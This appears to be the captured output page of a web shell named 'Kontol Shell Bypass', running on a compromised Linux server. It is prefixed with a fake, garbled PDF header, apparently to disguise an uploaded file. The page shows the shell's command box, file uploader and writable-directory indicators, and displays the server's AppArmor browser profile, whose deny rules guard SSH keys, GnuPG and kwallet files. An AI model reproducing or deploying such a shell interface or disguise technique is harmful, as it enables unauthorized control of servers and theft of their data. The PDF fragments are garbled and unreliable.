%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /etc/apparmor.d/abstractions/ubuntu-browsers.d/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //etc/apparmor.d/abstractions/ubuntu-browsers.d/user-files
# vim:syntax=apparmor

  # Allow read to all files user has DAC access to and write access to all
  # files owned by the user in $HOME.
  @{HOME}/ r,
  @{HOME}/** r,
  owner @{HOME}/** w,

  # Do not allow read and/or write to particularly sensitive/problematic files
  #include <abstractions/private-files>
  audit deny @{HOME}/.ssh/{,**} mrwkl,
  audit deny @{HOME}/.gnome2_private/{,**} mrwkl,
  audit deny @{HOME}/.kde{,4}/{,share/,share/apps/} w,
  audit deny @{HOME}/.kde{,4}/share/apps/kwallet/{,**} mrwkl,

  # Comment this out if using gpg plugin/addons
  audit deny @{HOME}/.gnupg/{,**} mrwkl,

  # Allow read to all files user has DAC access to and write for files the user
  # owns on removable media and filesystems.
  /media/** r,
  /mnt/** r,
  /srv/** r,
  /net/** r,
  owner /media/** w,
  owner /mnt/** w,
  owner /srv/** w,
  owner /net/** w,

Kontol Shell Bypass